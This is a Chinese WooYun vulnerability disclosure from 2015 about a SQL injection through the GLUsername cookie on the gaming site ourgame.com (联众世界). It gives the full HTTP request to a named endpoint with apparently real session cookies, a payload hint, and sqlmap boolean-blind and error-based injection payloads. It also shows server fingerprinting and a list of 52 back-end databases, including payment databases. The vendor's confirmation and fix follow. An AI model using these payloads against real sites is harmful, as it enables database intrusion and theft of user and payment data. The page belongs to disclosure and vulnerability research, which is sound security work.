当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116737

漏洞标题:联众世界主站cookie注射全站数据库泄露

相关厂商:联众世界

漏洞作者: 路人甲

提交时间:2015-05-28 17:01

修复时间:2015-07-12 22:54

公开时间:2015-07-12 22:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-28: 细节已通知厂商并且等待厂商处理中
2015-05-28: 厂商已经确认,细节仅向厂商公开
2015-06-07: 细节向核心白帽子及相关领域专家公开
2015-06-17: 细节向普通白帽子公开
2015-06-27: 细节向实习白帽子公开
2015-07-12: 细节向公众公开

简要描述:

233

详细说明:

GET /game/game-intro-new/frame/tetris_write.asp HTTP/1.1
Cookie: Hm_lvt_67ddb8f23a62eaa908fa8dee8b3bb411=1432725765; Hm_lpvt_67ddb8f23a62eaa908fa8dee8b3bb411=1432734514; phoneLock=1; guid=-1; s1=; GLAvatarValue=; s2=; ogun=dGVzdGJ5eQ2y38q%2FDTANMA0wDTANDTANDTENNDg1NzY4NTg2DTIwMTUtMDUtMjUgMTk6MjI6MTUNMA0wDTANMTk3MC0wMS0wMSAwODowMDowMA0NDTENDTE5NzAtMDEtMDEgMDg6MDA6MDANMA0yNTUNMjAxNTA1MjcxOTIyMTUNDTANMjAxNS0wNS0yNyAxOToyMzowMg0%3D%26023948CF5AD07E1E88AD5CE7421AF104; C_UOT=TJk9rhoOXAW%2FWKl%2BggLIN8UNPY3fodidoMjn929L%2F9gdSOPRP7btkml%2Fn7kg%2BSC%2FIhr6SgXaNbZqBSY2D2F2BzJd0cJn%2FLDDEZNEkJrzURh4veh16AWOA1glzVjh40uh2tCOkJaJewU63xVZnYGbdp0wo1xgwUxR73seHyG9vLI%3D; ogpt=SmU1JPkyneH74TmAVSpwhfszUUpoBRLMftnkwPpgdwaxNDN7zJaalNIa7tKDpKyf6n82u7DYhf%252BuYnFZSDtGOBrBNafeVxdB; NowShow=17770; ASPSESSIONIDAQTADQBS=CKJDLHCCKKNJINFABODBAEND; GLCoins=0; GLDigitalID=48586; GLNickname=2274; GLMoney=0; GLUsername=a; GLMemberdays=0; GLGroupName=260; GLDuty=26080; ASPSESSIONIDAQTBDRAS=LNEGGDPCOKHOHIHOIOLHCCIE
Host: www.ourgame.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
payload参考:
'+(select convert(int,db_name()) FROM syscolumns)+'

漏洞证明:

---
Parameter: GLUsername (Cookie)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Hm_lvt_67ddb8f23a62eaa908fa8dee8b3bb411=1432725765; Hm_lpvt_67ddb8f23a62eaa908fa8dee8b3bb411=1432734514; phoneLock=1; guid=-1; s1=; GLAvatarValue=; s2=; ogun=dGVzdGJ5eQ2y38q/DTANMA0wDTANDTANDTENNDg1NzY4NTg2DTIwMTUtMDUtMjUgMTk6MjI6MTUNMA0wDTANMTk3MC0wMS0wMSAwODowMDowMA0NDTENDTE5NzAtMDEtMDEgMDg6MDA6MDANMA0yNTUNMjAxNTA1MjcxOTIyMTUNDTANMjAxNS0wNS0yNyAxOToyMzowMg0=%26023948CF5AD07E1E88AD5CE7421AF104; C_UOT=TJk9rhoOXAW/WKl+ggLIN8UNPY3fodidoMjn929L/9gdSOPRP7btkml/n7kg+SC/Ihr6SgXaNbZqBSY2D2F2BzJd0cJn/LDDEZNEkJrzURh4veh16AWOA1glzVjh40uh2tCOkJaJewU63xVZnYGbdp0wo1xgwUxR73seHyG9vLI=; ogpt=SmU1JPkyneH74TmAVSpwhfszUUpoBRLMftnkwPpgdwaxNDN7zJaalNIa7tKDpKyf6n82u7DYhf%2BuYnFZSDtGOBrBNafeVxdB; NowShow=17770; ASPSESSIONIDAQTADQBS=CKJDLHCCKKNJINFABODBAEND; GLCoins=0; GLDigitalID=485768586; GLNickname=22763a31574; GLMoney=0; GLUsername=a'+(SELECT 'cfOx' WHERE 1470=1470 AND 7955=7955)+'; GLMemberdays=0; GLGroupName=26080; GLDuty=26080; ASPSESSIONIDAQTBDRAS=LNEGGDPCOKHOHIHOIOLHCCIE
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Hm_lvt_67ddb8f23a62eaa908fa8dee8b3bb411=1432725765; Hm_lpvt_67ddb8f23a62eaa908fa8dee8b3bb411=1432734514; phoneLock=1; guid=-1; s1=; GLAvatarValue=; s2=; ogun=dGVzdGJ5eQ2y38q/DTANMA0wDTANDTANDTENNDg1NzY4NTg2DTIwMTUtMDUtMjUgMTk6MjI6MTUNMA0wDTANMTk3MC0wMS0wMSAwODowMDowMA0NDTENDTE5NzAtMDEtMDEgMDg6MDA6MDANMA0yNTUNMjAxNTA1MjcxOTIyMTUNDTANMjAxNS0wNS0yNyAxOToyMzowMg0=%26023948CF5AD07E1E88AD5CE7421AF104; C_UOT=TJk9rhoOXAW/WKl+ggLIN8UNPY3fodidoMjn929L/9gdSOPRP7btkml/n7kg+SC/Ihr6SgXaNbZqBSY2D2F2BzJd0cJn/LDDEZNEkJrzURh4veh16AWOA1glzVjh40uh2tCOkJaJewU63xVZnYGbdp0wo1xgwUxR73seHyG9vLI=; ogpt=SmU1JPkyneH74TmAVSpwhfszUUpoBRLMftnkwPpgdwaxNDN7zJaalNIa7tKDpKyf6n82u7DYhf%2BuYnFZSDtGOBrBNafeVxdB; NowShow=17770; ASPSESSIONIDAQTADQBS=CKJDLHCCKKNJINFABODBAEND; GLCoins=0; GLDigitalID=485768586; GLNickname=22763a31574; GLMoney=0; GLUsername=a'+(SELECT 'oEwO' WHERE 2446=2446 AND 2950=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2950=2950) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(113))))+'; GLMemberdays=0; GLGroupName=26080; GLDuty=26080; ASPSESSIONIDAQTBDRAS=LNEGGDPCOKHOHIHOIOLHCCIE
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
available databases [52]:
[*] B2CPayment
[*] DBA
[*] DBADMIN
[*] DCacheConfigDB
[*] DzTranslation
[*] GL_DB
[*] GL_DB1
[*] GLAdmin
[*] GLB2B
[*] GLB2C
[*] GLBill
[*] GLBuy
[*] GLCOMM_Subject
[*] GLHomeApp
[*] GLImage
[*] GLJHBBS
[*] GLJHInnerBBS
[*] GLJHWEB
[*] GLLUCK
[*] GLLuckPlayer
[*] GLLuckValue
[*] GLNews
[*] GLOGWebCommon
[*] GLOGWEBSERVICE
[*] GLPowerCoin
[*] GLSubject
[*] GLTXBBS
[*] GLWOGBBS
[*] GLZuobi
[*] LZMain
[*] LZSubject
[*] LZWebapp
[*] lzwpt
[*] master
[*] MatchDB
[*] MatchDB1
[*] MatchDB2
[*] MatchDB3
[*] MatchDB_YDLY5
[*] MHBBS
[*] model
[*] msdb
[*] newjunqi
[*] OGMain
[*] OGManage
[*] OGSubject
[*] QLGBBS
[*] tempdb
[*] test_jhbbs
[*] TWLZMain
[*] TWLZMall
[*] WebChargeCenter

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-05-28 17:07

厂商回复:

感谢对联众的关注。漏洞处理中

最新状态:

2015-06-02:漏洞已经修复。深深的感谢小伙伴啊。

漏洞评价:

评论

  1. 2015-06-03 11:11 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    @联众世界 2015-06-02:漏洞已经修复。深深的感谢小伙伴啊。我刚看了,还没修复啊!!!!赶紧再看看。

  2. 2015-06-17 14:44 | 联众世界(乌云厂商)

    感谢提示,经过二次复查。该漏洞真心修复了。